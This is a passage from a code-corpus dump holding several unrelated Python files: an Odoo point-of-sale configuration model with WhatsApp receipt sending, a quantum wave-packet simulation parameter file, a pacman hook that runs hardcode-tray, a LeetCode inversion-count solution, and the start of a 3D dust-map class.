)\n\n allow_merge_lines = fields.Boolean(\n 'Allow Merge Lines',\n help='If checked, allow automatic merge new line the same Product to line has submited to Kitchen Receipt'\n )\n checkin_screen = fields.Boolean(\n 'CheckIn Screen',\n help='Customer easy Check In via Phone/Mobile \\n'\n 'If Client not register before, them easy register new'\n )\n\n hidden_product_ids = fields.Many2many(\n 'product.product',\n 'pos_config_product_hidden_rel',\n 'pos_config_id',\n 'product_id',\n string=\"Hidden Products\",\n help='Hidden Products selected here out of POS Products Screen'\n )\n\n warning_closing_session = fields.Boolean(\n 'Warning Closing Session',\n default=1,\n help='Warning Users when them close session \\n'\n 'With 2 reason bellow, we will warning POS Users when them closing a POS Screen \\n'\n '1. If have orders draft, not full fill payment and submit to Odoo Server \\n'\n '2. If Odoo server offline, and users close POS, could not open POS screen back\\n'\n 'Will Warning for users'\n )\n warning_odoo_offline = fields.Boolean(\n 'Warning Odoo Offline',\n default=1,\n help='When POS User finish and Validate Order \\n'\n 'If POS counter have internet problem (offline) \\n'\n 'Or Your Odoo Offline \\n'\n 'POS Screen automatic warning POS Users before Validate the Order'\n )\n pos_title = fields.Char('POS Title', default='TL Technologies')\n\n def send_message_via_whatsapp(self, pos_config_id, mobile_no, message):\n _logger.info('[send_message_via_whatsapp]: %s' % mobile_no)\n mobile_no = re.sub('[^0-9]', '', mobile_no)\n if not mobile_no:\n return False\n pos = self.sudo().browse(pos_config_id)\n endpoint = pos.whatsapp_api\n token = pos.whatsapp_token\n url = ''\n if all([endpoint, token]):\n url = f\"{endpoint}/sendMessage?token={token}\"\n else:\n ValidationError(_(f'Missing Whatsapp credentials, \\ncontact to your Admin.'))\n if not url:\n return json.dumps(\"Missing Whatsapp configuration, contact to your Admin\")\n headers = {\n 'Content-Type': 'application/json',\n }\n payload = {\n 'phone': mobile_no,\n 'body': message,\n }\n try:\n req = requests.post(url, data=json.dumps(payload), headers=headers)\n response = req.json()\n if req.status_code == 201 or req.status_code == 200:\n _logger.info(\n f\"\\n[send_message_via_whatsapp] Send Message successfully send to phone number : {mobile_no}\")\n else:\n if 'error' in response:\n message = response['error']\n _logger.error(f\"[send_message_via_whatsapp] Reason: {req.reason}, Message:{message}\")\n return response\n except Exception as e:\n _logger.error(e)\n return e\n\n def send_receipt_via_whatsapp(self, pos_config_id, ticket_img, mobile_no, message):\n _logger.info('[send_receipt_via_whatsapp]: %s' % mobile_no)\n mobile_no = re.sub('[^0-9]', '', mobile_no)\n if not mobile_no:\n return False\n if message:\n self.send_message_via_whatsapp(pos_config_id, mobile_no, message)\n pos = self.sudo().browse(pos_config_id)\n endpoint = pos.whatsapp_api\n token = pos.whatsapp_token\n url = ''\n if all([endpoint, token]):\n url = f\"{endpoint}/sendFile?token={token}\"\n else:\n ValidationError(_(f'Missing Whatsapp credentials, \\ncontact to your Admin.'))\n if not url:\n return json.dumps(\"Missing Whatsapp configuration, contact to your Admin\")\n headers = {\n 'Content-Type': 'application/json',\n }\n payload = {\n 'phone': mobile_no,\n 'body': f\"data:image/jpeg;base64,{ticket_img}\",\n 'filename': \"POS-Receipt-%s.jpeg\" % fields.Datetime.now()\n }\n try:\n req = requests.post(url, data=json.dumps(payload), headers=headers)\n response = req.json()\n if req.status_code == 201 or req.status_code == 200:\n _logger.info(\n f\"\\n[send_receipt_via_whatsapp] Send Receipt successfully send to phone number : {mobile_no}\")\n else:\n if 'error' in response:\n message = response['error']\n _logger.error(f\"[send_receipt_via_whatsapp] Reason: {req.reason}, Message:{message}\")\n return response\n except Exception as e:\n _logger.error(e)\n return e\n\n def send_pdf_via_whatsapp(self, pos_config_id, file_name, report_ref, record_id, mobile_no, message):\n mobile_no = re.sub('[^0-9]', '', mobile_no)\n if not mobile_no:\n return False\n if message:\n self.send_message_via_whatsapp(pos_config_id, mobile_no, message)\n qr_pdf = self.env.ref(report_ref)._render_qweb_pdf(record_id)\n file = qr_pdf[0]\n qr_pdf = base64.b64encode(qr_pdf[0])\n pos = self.sudo().browse(pos_config_id)\n endpoint = pos.whatsapp_api\n token = pos.whatsapp_token\n url = ''\n if all([endpoint, token]):\n url = f\"{endpoint}/sendFile?token={token}\"\n else:\n ValidationError(_(f'Missing Whatsapp credentials, \\ncontact to your Admin.'))\n if not url:\n return json.dumps(\"Missing Whatsapp configuration, contact to your Admin\")\n headers = {\n 'Content-Type': 'application/json',\n }\n payload = {\n 'phone': mobile_no,\n 'body': 'data:application/pdf;base64,' + str(qr_pdf)[2:-1],\n 'filename': \"%s-%s.pdf\" % (file_name, fields.Datetime.now())\n }\n try:\n req = requests.post(url, data=json.dumps(payload), headers=headers)\n response = req.json()\n if req.status_code == 201 or req.status_code == 200:\n _logger.info(\n f\"\\n[send_pdf_via_whatsapp] Send Receipt successfully send to phone number : {mobile_no}\")\n else:\n if 'error' in response:\n message = response['error']\n _logger.error(f\"[send_pdf_via_whatsapp] Reason: {req.reason}, Message:{message}\")\n return response\n except Exception as e:\n _logger.error(e)\n return e\n\n def revertToDefaultStyle(self):\n self.write({\n 'background': '#fff',\n 'primary_color': '#FF5722',\n 'secondary_color': '#6EC89B',\n 'three_color': '#875A7B',\n 'payment_screen_background': '#fff',\n 'product_screen_background': '#875A7B',\n 'cart_box_style': 'right',\n 'product_width': 18,\n 'product_height': 18,\n 'display_product_image': 'inline-block',\n 'cart_width': 650,\n 'cart_background': '#ffffff',\n 'font_family': '\"Montserrat\", \"Odoo Unicode Support Noto\", sans-serif'\n })\n\n def _check_has_sessions_not_closed(self):\n for config in self:\n sessions = self.env['pos.session'].sudo().search([\n ('state', '!=', 'closed'),\n ('config_id', '=', config.id)\n ])\n if sessions:\n config.sessions_opened = True\n else:\n config.sessions_opened = False\n\n def _get_sync_with_sessions(self):\n for config in self:\n config.sync_multi_session_with = ''\n if config.sync_multi_session:\n for c in config.sync_to_pos_config_ids:\n config.sync_multi_session_with += c.name + ' / '\n\n @api.onchange('allow_numpad')\n def onchange_allow_numpad(self):\n if not self.allow_numpad:\n self.allow_discount = False\n self.allow_qty = False\n self.allow_price = False\n self.allow_remove_line = False\n self.allow_minus = False\n else:\n self.allow_discount = True\n self.allow_qty = True\n self.allow_price = True\n self.allow_remove_line = True\n self.allow_minus = True\n\n def _get_last_save_cache(self):\n for config in self:\n log = self.env['pos.call.log'].search([], limit=1)\n if log:\n config.last_save_cache = log.write_date\n else:\n config.last_save_cache = 'Not Install Before'\n\n @api.onchange('mrp')\n def onchange_mrp(self):\n if not self.mrp:\n self.mrp_bom_auto_assign = False\n self.mrp_auto_confirm = False\n self.mrp_auto_assign = False\n self.mrp_auto_done = False\n self.mrp_produce_direct = False\n\n @api.onchange('sync_multi_session')\n def onchange_sync_multi_session(self):\n if not self.sync_multi_session:\n self.sync_multi_session_manual_stop = False\n\n @api.onchange('mrp_auto_done')\n def onchange_mrp_auto_assign(self):\n if self.mrp_auto_done:\n self.mrp_auto_assign = True\n self.mrp_auto_confirm = True\n\n def remove_sync_between_session_logs(self):\n for config in self:\n sessions = self.env['pos.session'].search([(\n 'config_id', '=', config.id\n )])\n return True\n\n @api.onchange('discount')\n def onchange_discount(self):\n if self.discount:\n self.discount_limit_amount = 0\n self.discount_limit = False\n\n @api.onchange('multi_stock_operation_type')\n def onchange_multi_stock_operation_type(self):\n if not self.multi_stock_operation_type:\n self.multi_stock_operation_type_ids = [(6, 0, [])]\n\n def reinstall_database(self):\n ###########################################################################################################\n # new field append :\n # - update param\n # - remove logs datas\n # - remove cache\n # - reload pos\n # - reinstall pos data\n # reinstall data button:\n # - remove all param\n # - pos start save param\n # - pos reinstall with new param\n # refresh call logs:\n # - get fields domain from param\n # - refresh data with new fields and domain\n ###########################################################################################################\n parameters = self.env['ir.config_parameter'].sudo().search([\n ('key', 'in', [\n 'product.product', 'res.partner',\n 'account.move', 'account.move.line',\n 'pos.order', 'pos.order.line',\n 'sale.order', 'sale.order.line'\n ])])\n if parameters:\n parameters.sudo().unlink()\n self.env['pos.cache.database'].search([]).unlink()\n self.env['pos.call.log'].search([]).unlink()\n sessions_opened = self.env['pos.session'].sudo().search([('state', '=', 'opened')])\n sessions_opened.write({\n 'required_reinstall_cache': True\n })\n for session in sessions_opened:\n self.env['bus.bus'].sendmany(\n [[(self.env.cr.dbname, 'pos.remote_sessions', session.user_id.id), json.dumps({\n 'remove_cache': True,\n 'database': self.env.cr.dbname,\n 'session_id': session.id\n })]])\n for config in self:\n sessions = self.env['pos.session'].sudo().search(\n [('config_id', '=', config.id), ('state', '=', 'opened')])\n if not sessions:\n return {\n 'type': 'ir.actions.act_url',\n 'url': '/pos/web?config_id=%d' % config.id,\n 'target': 'self',\n }\n sessions.write({'required_reinstall_cache': True})\n config_fw = config\n self.env['pos.session'].sudo().search(\n [('config_id', '!=', config.id), ('state', '=', 'opened')]).write({'required_reinstall_cache': True})\n return {\n 'type': 'ir.actions.act_url',\n 'url': '/pos/web?config_id=%d' % config_fw.id,\n 'target': 'self',\n }\n\n def remote_sessions(self):\n return {\n 'name': _('Remote sessions'),\n 'view_type': 'form',\n 'target': 'new',\n 'view_mode': 'form',\n 'res_model': 'pos.remote.session',\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'context': {},\n }\n\n def validate_and_post_entries_session(self):\n for config in self:\n sessions = self.env['pos.session'].search([\n ('config_id', '=', config.id),\n ('state', '!=', 'closed'),\n ('rescue', '=', False)\n ])\n if not sessions:\n sessions = self.env['pos.session'].search([\n ('config_id', '=', config.id),\n ('state', '!=', 'closed'),\n ('rescue', '=', True)\n ])\n if sessions:\n for session in sessions:\n if session.cash_control and abs(\n session.cash_register_difference) > session.config_id.amount_authorized_diff:\n return {\n 'name': _('Session'),\n 'view_mode': 'form,tree',\n 'res_model': 'pos.session',\n 'res_id': session.id,\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n }\n else:\n session.force_action_pos_session_close()\n vals = {\n 'validate_and_post_entries': True,\n 'session_id': session.id,\n 'config_id': session.config_id.id,\n 'database': self.env.cr.dbname\n }\n self.env['bus.bus'].sendmany(\n [[(self.env.cr.dbname, 'pos.remote_sessions', session.user_id.id), json.dumps(vals)]])\n else:\n raise UserError('Have not any Sessions need Close')\n return True\n\n def write(self, vals):\n if vals.get('allow_discount', False) or vals.get('allow_qty', False) or vals.get('allow_price', False):\n vals['allow_numpad'] = True\n if vals.get('expired_days_voucher', None) and vals.get('expired_days_voucher') < 0:\n raise UserError('Expired days of voucher could not smaller than 0')\n if config.pos_order_period_return_days <= 0:\n raise UserError('Period days return orders and products required bigger than or equal 0 day')\n res = super(PosConfig, self).write(vals)\n for config in self:\n if vals.get('management_session', False) and not vals.get('default_cashbox_id'):\n if not config.default_cashbox_id and not config.cash_control:\n raise UserError(\n 'Your POS config missed config Default Opening (Cash Control), Please go to Cash control and set Default Opening')\n if vals.get('google_map_api_key', None):\n self.env['ir.config_parameter'].sudo().set_param('base_geolocalize.google_map_api_key',\n vals.get('google_map_api_key', None))\n for c in self:\n sessions = self.env['pos.session'].search([\n ('config_id', '=', c.id),\n ('state', '=', 'opened')\n ])\n sessions.update_stock_at_closing = c.point_of_sale_update_stock_quantities == 'closing'\n return res\n\n def forceChangeUI(self):\n for config in self:\n sessions = self.env['pos.session'].search([\n ('config_id', '=', config.id),\n ('state', '=', 'opened')\n ])\n if sessions:\n config = self.search_read([\n ('id', '=', config.id),\n ], [\n 'id',\n 'background',\n 'primary_color',\n 'secondary_color',\n 'three_color',\n 'cart_box_style',\n 'product_width',\n 'product_height',\n 'cart_width',\n 'cart_background',\n 'font_family',\n 'display_product_image',\n 'payment_screen_background',\n ])[0]\n for s in sessions:\n self.env['bus.bus'].sendmany(\n [[(self.env.cr.dbname, 'pos.modifiers.background', s.user_id.id),\n json.dumps(config)]])\n return True\n\n @api.model\n def create(self, vals):\n if vals.get('allow_discount', False) or vals.get('allow_qty', False) or vals.get('allow_price', False):\n vals['allow_numpad'] = True\n if vals.get('expired_days_voucher', 0) < 0:\n raise UserError('Expired days of voucher could not smaller than 0')\n config = super(PosConfig, self).create(vals)\n if config.pos_order_period_return_days <= 0:\n raise UserError('Period days return orders and products required bigger than or equal 0 day')\n if config.management_session and not config.default_cashbox_id and not config.cash_control:\n raise UserError(\n 'Your POS config missed config Default Opening (Cash Control), Please go to Cash control and set Default Opening')\n if vals.get('google_map_api_key', None):\n self.env['ir.config_parameter'].sudo().set_param('base_geolocalize.google_map_api_key',\n vals.get('google_map_api_key', None))\n return config\n\n @api.onchange('printer_id')\n @api.model\n def onchange_printer_id(self):\n if self.printer_id:\n self.is_posbox = True\n self.iface_print_via_proxy = True\n if not self.proxy_ip:\n warning = {\n 'title': _(\"Warning, input required !\"),\n 'message': _('Please input IoT Box IP Address')\n }\n return {'warning': warning}\n\n @api.onchange('printer_ids')\n @api.model\n def onchange_printer_ids(self):\n if self.printer_ids:\n for printer in self.printer_ids:\n if printer.printer_type == 'network':\n self.is_posbox = True\n self.iface_print_via_proxy = True\n if not self.proxy_ip:\n warning = {\n 'title': _(\"Warning, input required !\"),\n 'message': _('Please input IoT Box IP Address')\n }\n return {'warning': warning}\n\n @api.onchange('allow_split_table')\n def _onchange_allow_split_table(self):\n if self.allow_split_table:\n self.iface_splitbill = True\n\n @api.onchange('is_posbox')\n def _onchange_is_posbox(self):\n super(PosConfig, self)._onchange_is_posbox()\n if not self.is_posbox:\n self.printer_id = False\n\n @api.model\n @api.onchange('management_session')\n def _onchange_management_session(self):\n self.cash_control = self.management_session\n\n def init_payment_method(self, journal_name, journal_sequence, journal_code, account_code, pos_method_type):\n Journal = self.env['account.journal'].sudo()\n Method = self.env['pos.payment.method'].sudo()\n IrModelData = self.env['ir.model.data'].sudo()\n IrSequence = self.env['ir.sequence'].sudo()\n Account = self.env['account.account'].sudo()\n user = self.env.user\n accounts = Account.search([\n ('code', '=', account_code), ('company_id', '=', self.company_id.id)])\n if accounts:\n accounts.sudo().write({'reconcile': True})\n account = accounts[0]\n\n else:\n account = Account.create({\n 'name': journal_name,\n 'code': account_code,\n 'user_type_id': self.env.ref('account.data_account_type_current_assets').id,\n 'company_id': self.company_id.id,\n 'note': 'code \"%s\" auto give voucher histories of customers' % account_code,\n 'reconcile': True\n })\n model_datas = IrModelData.search([\n ('name', '=', account_code + str(self.company_id.id)),\n ('module', '=', \"pos_retail\"),\n ('model', '=', 'account.account'),\n ('res_id', '=', account.id),\n ])\n if not model_datas:\n IrModelData.create({\n 'name': account_code + str(self.company_id.id),\n 'model': 'account.account',\n 'module': \"pos_retail\",\n 'res_id': account.id,\n 'noupdate': True, # If it's False, target record (res_id) will be removed while module update\n })\n\n journals = Journal.search([\n ('code', '=', journal_code),\n ('company_id', '=', self.company_id.id),\n ])\n if journals:\n journals.sudo().write({\n 'loss_account_id': account.id,\n 'profit_account_id': account.id,\n 'pos_method_type': pos_method_type,\n 'sequence': journal_sequence,\n })\n journal = journals[0]\n else:\n new_sequence = IrSequence.create({\n 'name': journal_name + str(self.company_id.id),\n 'padding': 3,\n 'prefix': account_code + str(self.company_id.id),\n })\n model_datas = IrModelData.search(\n [\n ('name', '=', account_code + str(new_sequence.id)),\n ('module', '=', \"pos_retail\"),\n ('model', '=', 'ir.sequence'),\n ('res_id', '=', new_sequence.id),\n ])\n if not model_datas:\n IrModelData.create({\n 'name': account_code + str(new_sequence.id),\n 'model': 'ir.sequence',\n 'module': \"pos_retail\",\n 'res_id': new_sequence.id,\n 'noupdate': True,\n })\n journal = Journal.create({\n 'name': journal_name,\n 'code': journal_code,\n 'type': 'cash',\n 'pos_method_type': pos_method_type,\n 'company_id': self.company_id.id,\n 'loss_account_id': account.id,\n 'profit_account_id': account.id,\n 'sequence': journal_sequence,\n })\n model_datas = IrModelData.search(\n [\n ('name', '=', account_code + str(journal.id)),\n ('module', '=', \"pos_retail\"),\n ('model', '=', 'account.journal'),\n ('res_id', '=', int(journal.id)),\n ])\n if not model_datas:\n IrModelData.create({\n 'name': account_code + str(journal.id),\n 'model': 'account.journal',\n 'module': \"pos_retail\",\n 'res_id': int(journal.id),\n 'noupdate': True,\n })\n methods = Method.search([\n ('name', '=', journal_name),\n ('company_id', '=', self.company_id.id)\n ])\n if not methods:\n method = Method.create({\n 'name': journal_name,\n 'receivable_account_id': account.id,\n 'cash_journal_id': journal.id,\n 'company_id': self.company_id.id,\n })\n else:\n method_ids = [method.id for method in methods]\n if len(method_ids) > 0:\n method_ids.append(0)\n self.env.cr.execute(\n \"UPDATE pos_payment_method SET is_cash_count=False where id in %s\", (tuple(method_ids),))\n method = methods[0]\n for config in self:\n opened_session = config.mapped('session_ids').filtered(lambda s: s.state != 'closed')\n if not opened_session:\n payment_method_added_ids = [payment_method.id for payment_method in config.payment_method_ids]\n if method.id not in payment_method_added_ids:\n payment_method_added_ids.append(method.id)\n config.sudo().write({\n 'payment_method_ids': [(6, 0, payment_method_added_ids)],\n })\n return True\n\n def open_ui(self):\n self.ensure_one()\n if not self.picking_type_id.default_location_src_id:\n raise UserError(\n 'It not possible start POS Session if your POS Operation Type: %s not set Default Source Location' % self.picking_type_id.name)\n self.init_payment_method('Voucher', 100, 'JV', 'AJV', 'voucher')\n self.init_payment_method('Wallet', 101, 'JW', 'AJW', 'wallet')\n self.init_payment_method('Credit', 102, 'JC', 'AJC', 'credit')\n self.init_payment_method('Return Order', 103, 'JRO', 'AJRO', 'return')\n self.init_payment_method('Rounding Amount', 100, 'JRA', 'AJRA', 'rounding')\n return super(PosConfig, self).open_ui()\n\n def open_session_cb(self, check_coa=True):\n self.ensure_one()\n if not self.picking_type_id.default_location_src_id:\n raise UserError(\n 'It not possible start POS Session if your POS Operation Type: %s not set Default Source Location' % self.picking_type_id.name)\n self.init_payment_method('Voucher', 100, 'JV', 'AJV', 'voucher')\n self.init_payment_method('Wallet', 101, 'JW', 'AJW', 'wallet')\n self.init_payment_method('Credit', 102, 'JC', 'AJC', 'credit')\n self.init_payment_method('Return Order', 103, 'JRO', 'AJRO', 'return')\n self.init_payment_method('Rounding Amount', 100, 'JRA', 'AJRA', 'rounding')\n return super(PosConfig, self).open_session_cb(check_coa)\n\n def get_voucher_number(self, config_id):\n config = self.browse(config_id)\n if not config.voucher_sequence_id:\n raise UserError(\n u'Your POS Config not setting Voucher Sequence, please contact your POS Manager setting it before try this feature')\n else:\n return config.voucher_sequence_id._next()\n\n # TODO: for supported multi pricelist difference currency\n @api.constrains('pricelist_id', 'use_pricelist', 'available_pricelist_ids', 'journal_id', 'invoice_journal_id',\n 'payment_method_ids')\n def _check_currencies(self):\n return True\n # for config in self:\n # if config.use_pricelist and config.pricelist_id not in config.available_pricelist_ids:\n # raise ValidationError(_(\"The default pricelist must be included in the available pricelists.\"))\n # if self.invoice_journal_id.currency_id and self.invoice_journal_id.currency_id != self.currency_id:\n # raise ValidationError(_(\n # \"The invoice journal must be in the same currency as the Sales Journal or the company currency if that is not set.\"))\n # if any(\n # self.payment_method_ids \\\n # .filtered(lambda pm: pm.is_cash_count) \\\n # .mapped(\n # lambda pm: self.currency_id not in (self.company_id.currency_id | pm.cash_journal_id.currency_id))\n # ):\n # raise ValidationError(_(\n # \"All payment methods must be in the same currency as the Sales Journal or the company currency if that is not set.\"))\n\n def new_rate(self, from_amount, to_currency):\n pricelist_currency = self.env['res.currency'].browse(to_currency)\n company_currency = self.company_id.currency_id\n new_rate = company_currency._convert(from_amount, pricelist_currency,\n self.company_id or self.env.user.company_id, fields.Date.today())\n return new_rate\n\n def _open_session(self, session_id):\n session_form = super(PosConfig, self)._open_session(session_id)\n session = self.env['pos.session'].browse(session_id)\n if session.config_id.start_session_oneclick:\n session.action_pos_session_open()\n return session.open_frontend_cb()\n else:\n return session_form\n","sub_path":"pos_retail/models/pos/PosConfig.py","file_name":"PosConfig.py","file_ext":"py","file_size_in_byte":77564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"495867158","text":"\"\"\"Multistate Simulation\n\nThis is the configuration file for the multistate simulation code.\nAll available configuration parameters can be set here. This file\nis imported from the simulation code. For configuring the code, just\nmodifiy the values here.\n\n@author: R. Bourquin\n@copyright: Copyright (C) 2010 R. Bourquin\n@license: ?\n\"\"\"\n\n# Algorithm \n# =========\n\n#: The algorithm used for time propagation, can be\n#: one of \"fourier\" | \"hagedorn\" | \"multihagedorn\"\nalgorithm = \"hagedorn\"\n\n\n# Potential\n# =========\n\n#: The potential used in the simulation\npotential = \"two_crossings\"\n\n\n# Time stepping\n# =============\n\n#: Perform a simulation in the time interval [0, T].\nT = 16\n\n#: Duration of a single time step.\ndt = 0.02\n\n\n# Semi-classical parameters\n# =========================\n\n#: The epsilon parameter in the semiclassical scaling\neps = 0.2\n\n#: A free variable that is used for definition of some potentials\ndelta = 2.5*eps\n\n\n# Initial values\n# ==============\n\n#: Some hagedorn parameters that can be used for defining the initial values.\nP = 1.0j\nQ = 1.0-6.0j\nS = 0.0\n\n#: A list with the lists of (index,value) tuples that set the coefficients\n#: of the basis functions for the initial wave packets.\n#: Format: [packet][index,value]\ncoefficients = [ [(0,1.0)], [(0,0.0)] ]\n\n#: The hagedorn parameters of the initial wave packets\n#: Format is [ (P0,Q0,S0,p0,q0), (P1,Q1,S1,p1,q1), ... ]\nparameters = [ (P, Q, S, 1.0, -6.0), (P, Q, S, 1.0, -6.0) ]\n\n\n# Specific for Fourier\n# ====================\n\n#: Number of grid nodes\nngn = 2**12\n\n#: Scaling factor for the computational domain\n#: The interval in the position space is [-f*pi, f*pi]\nf = 5.0\n\n\n# Specific for Hagedorn\n# =====================\n\n#: Number of basis functions used for hagedorn packages.\nbasis_size = 64\n\n#: The leading component is the eigenvalue that governs the propagation of\n#: the hagedorn parameters.\nleading_component = 0\n\n\n# Specific for Multi Hagedorn\n# ===========================\n\n# None, but basis_size applies here too.\n\n\n# Output parameters\n# =================\n\n#: Filename for the output file that contains the grid nodes\noutfile_nodes = \"nodes.dat\"\n#: Filename for the output file that contains the potential\noutfile_potential = \"potential.dat\"\n#: Filename for the output file that contains the wavefunctions\noutfile_wavefunction = \"wavefunction.dat\"\n#: Filename for the output file that contains the energies\noutfile_energies = \"energies.dat\"\n#: Filename for the output file that contains the operators T and V\noutfile_operators = \"operators.dat\"\n#: Filename for the output file that contains the hagedorn parameters\noutfile_parameters = \"parameters.dat\"\n#: Filename for the output file that contains the hagedorn coefficients\noutfile_coefficients = \"coefficients.dat\"\n\n#: Write data to disk only each n-th timestep\nwrite_nth = 1\n","sub_path":"BT/plot/two_crossings/Parameters_h_dt0.02_eps0.2_d2.5e_p1/Parameters_f_dt0.02_eps0.2_d2.5e_p1.py","file_name":"Parameters_f_dt0.02_eps0.2_d2.5e_p1.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"87653946","text":"#!/usr/bin/env python3\n\nimport json\nimport re\nimport sys\n\nfrom subprocess import run, PIPE\nfrom glob import glob\nfrom os import path\n\nfrom HardcodeTray.const import DB_FOLDER, USERHOME\n\nHARDCORE_TRAY_PACKAGES = ['hardcode-tray-git', 'hardcode-tray']\nBLACKLIST = ['mullvad'] # Added cause got /usr/bin in it paths\n\nCONVERSION_TOOL = 'RSVGConvert' # None if not needed\nTHEME = 'Papirus-Dark' # None if not needed\n\n\nclass Hook:\n userhome_re = r\"{userhome}\"\n\n def __init__(self, packages):\n self.__packages = packages\n self.__db = self.read_db_files()\n\n\n def read_db_files(self):\n \"\"\" Reading all package paths \"\"\"\n\n files = glob(\"{0}*.json\".format(path.join(DB_FOLDER, \"\")))\n db = {}\n\n for db_file in files:\n script_name = path.splitext(path.basename(db_file))[0]\n\n if script_name in BLACKLIST:\n continue\n\n with open(db_file, 'r') as db_file:\n app_path = json.load(db_file)['app_path']\n db[script_name] = [re.sub(Hook.userhome_re, USERHOME, sctipt_path) for sctipt_path in app_path]\n\n return db\n\n def get_package_paths(self, package):\n \"\"\" Reading all package paths from pacman \"\"\"\n\n regex = r\"^%s\\s+\" % re.escape(package)\n proc = run(\n [\n \"pacman\", \"-Ql\",\n package\n ],\n stdout=PIPE,\n stderr=PIPE,\n )\n\n if proc.returncode == 0:\n output = str(proc.stdout, \"utf-8\").split('\\n')\n return [re.sub(regex, '',line) for line in output if re.match(regex, line)]\n else:\n return []\n\n def get_supported_scripts(self):\n \"\"\" Finding supported scripts \"\"\"\n\n supported_scripts = [];\n\n for package in self.__packages:\n package_paths = self.get_package_paths(package)\n for path in package_paths:\n for script_name, script_paths in self.__db.items():\n if path in script_paths:\n supported_scripts.append(script_name)\n\n return set(supported_scripts)\n\n def run_hadcode_tray(self, packages = None):\n \"\"\" Hardcode tray bit execution \"\"\"\n\n args = [\"hardcode-tray\"]\n\n if CONVERSION_TOOL != None:\n args += [\"--conversion-tool\", CONVERSION_TOOL]\n\n if THEME != None:\n args += [\"--theme\", THEME]\n\n if packages != None:\n args += [\"--only\", ','.join(packages)]\n\n args.append(\"--apply\")\n\n proc = run(\n args,\n stdout=PIPE,\n stderr=PIPE,\n )\n\n return (proc.returncode == 0)\n\n def execute(self):\n \"\"\" Execution method running hardcode-tray for supported apps\"\"\"\n\n for package in self.__packages:\n if package in HARDCORE_TRAY_PACKAGES:\n if self.run_hadcode_tray():\n print(\"All packages are updated.\")\n return True\n else:\n print(\"Packages update failed.\")\n return False\n\n packages_for_update = self.get_supported_scripts()\n\n if len(packages_for_update) == 0:\n print(\"No packages for update has been found.\")\n return True\n else:\n if self.run_hadcode_tray(packages_for_update):\n print(\"Packages: %s - updated.\" % ', '.join(packages_for_update))\n return True\n else:\n print(\"Packages: %s - failed.\" % ', '.join(packages_for_update))\n return False\n\n return True\n\ninput_str = sys.stdin.read()\npackages = [x for x in input_str.split('\\n') if x]\nhook = Hook(packages)\n\nif not hook.execute():\n sys.exit('Hook failed')\n","sub_path":"hardcode-tray-git/hook.py","file_name":"hook.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"93906621","text":"class Solution(object):\n def reversePairs(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n n = len(nums)\n temp = [0]*n\n return self.mergeSort(nums,temp,0,n-1)\n \n def mergeSort(self,nums,temp,left,right):\n if left>=right:\n return 0\n mid = (right-left)//2+left\n count = self.mergeSort(nums,temp,left,mid)+self.mergeSort(nums,temp,mid+1,right)\n i,j,pos = left,mid+1,left\n while i<=mid and j<=right:\n if nums[i]<=nums[j]:\n temp[pos] = nums[i]\n i+=1\n count+=j-mid-1\n else:\n temp[pos] = nums[j]\n j+=1\n pos+=1\n for k in range(i,mid+1):\n temp[pos] = nums[k]\n count+=j-mid-1\n pos+=1\n for k in range(j,right+1):\n temp[pos] = nums[k]\n pos+=1\n nums[left:right+1] = temp[left:right+1]\n return count\n\ns = Solution()\nprint(s.reversePairs([7,5,6,4]))\n","sub_path":"面试题51数组中的逆序对.py","file_name":"面试题51数组中的逆序对.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"245842361","text":"###############################################################################\n#\n# Green15: extinction model from Green et al. (2015)\n#\n###############################################################################\nimport os, os.path\nimport numpy\nimport h5py\nfrom scipy import interpolate\nimport healpy\nfrom mwdust.util.extCurves import aebv\nfrom DustMap3D import DustMap3D\n_DEGTORAD= numpy.pi/180.\n_greendir= os.path.join(os.getenv('DUST_DIR'),'green15')\nclass Green15(DustMap3D):\n \"\"\"extinction model from Green et al. (2015)\"\"\"\n def __init__(self,filter=None,sf10=True,load_samples=False,\n interpk=1):\n \"\"\"\n NAME:\n __init__\n PURPOSE:\n Initialize the Green et al. (2015) dust map\n INPUT:\n filter= filter to return the extinction in\n sf10= (True) if True, use the Schlafly & Finkbeiner calibrations\n load_samples= (False) if True, also load the samples\n interpk= (1) interpolation order\n OUTPUT:\n object\n HISTORY:\n 2015-03-02 - Started - Bovy (IAS)\n \"\"\"\n DustMap3D.__init__(self,filter=filter)\n self._sf10= sf10\n #Read the map\n with h5py.File(os.path.join(_greendir,'dust-map-3d.h5'),'r') \\\n as greendata:\n self._pix_info= greendata['/pixel_info'][:]\n if load_samples:\n self._samples= greendata['/samples'][:]\n self._best_fit= greendata['/best_fit'][:]\n self._GR= greendata['/GRDiagnostic'][:]\n # Utilities\n self._distmods= numpy.linspace(4.,19.,31)\n self._minnside= numpy.amin(self._pix_info['nside'])\n self._maxnside= numpy.amax(self._pix_info['nside'])\n nlevels= int(numpy.log2(self._maxnside//self._minnside))+1\n self._nsides= [self._maxnside//2**ii for ii in range(nlevels)]\n self._indexArray= numpy.arange(len(self._pix_info['healpix_index']))\n # For the interpolation\n self._intps= numpy.zeros(len(self._pix_info['healpix_index']),\n dtype='object') #array to cache interpolated extinctions\n self._interpk= interpk\n return None\n\n def substitute_sample(self,samplenum):\n \"\"\"\n NAME:\n substitute_sample\n PURPOSE:\n substitute a sample for the best fit to get the extinction from a sample with the same tools; need to have setup the instance with load_samples=True\n INPUT:\n samplenum - sample's index to load\n OUTPUT:\n (none; just resets the instance to use the sample rather than the best fit; one cannot go back to the best fit after this))\n HISTORY:\n 2015-03-08 - Written - Bovy (IAS)\n \"\"\"\n # Substitute the sample\n self._best_fit= self._samples[:,samplenum,:]\n # Reset the cache\n self._intps= numpy.zeros(len(self._pix_info['healpix_index']),\n dtype='object') #array to cache interpolated extinctions\n return None\n\n def _evaluate(self,l,b,d):\n \"\"\"\n NAME:\n _evaluate\n PURPOSE:\n evaluate the dust-map\n INPUT:\n l- Galactic longitude (deg)\n b- Galactic latitude (deg)\n d- distance (kpc) can be array\n OUTPUT:\n extinction E(B-V)\n HISTORY:\n 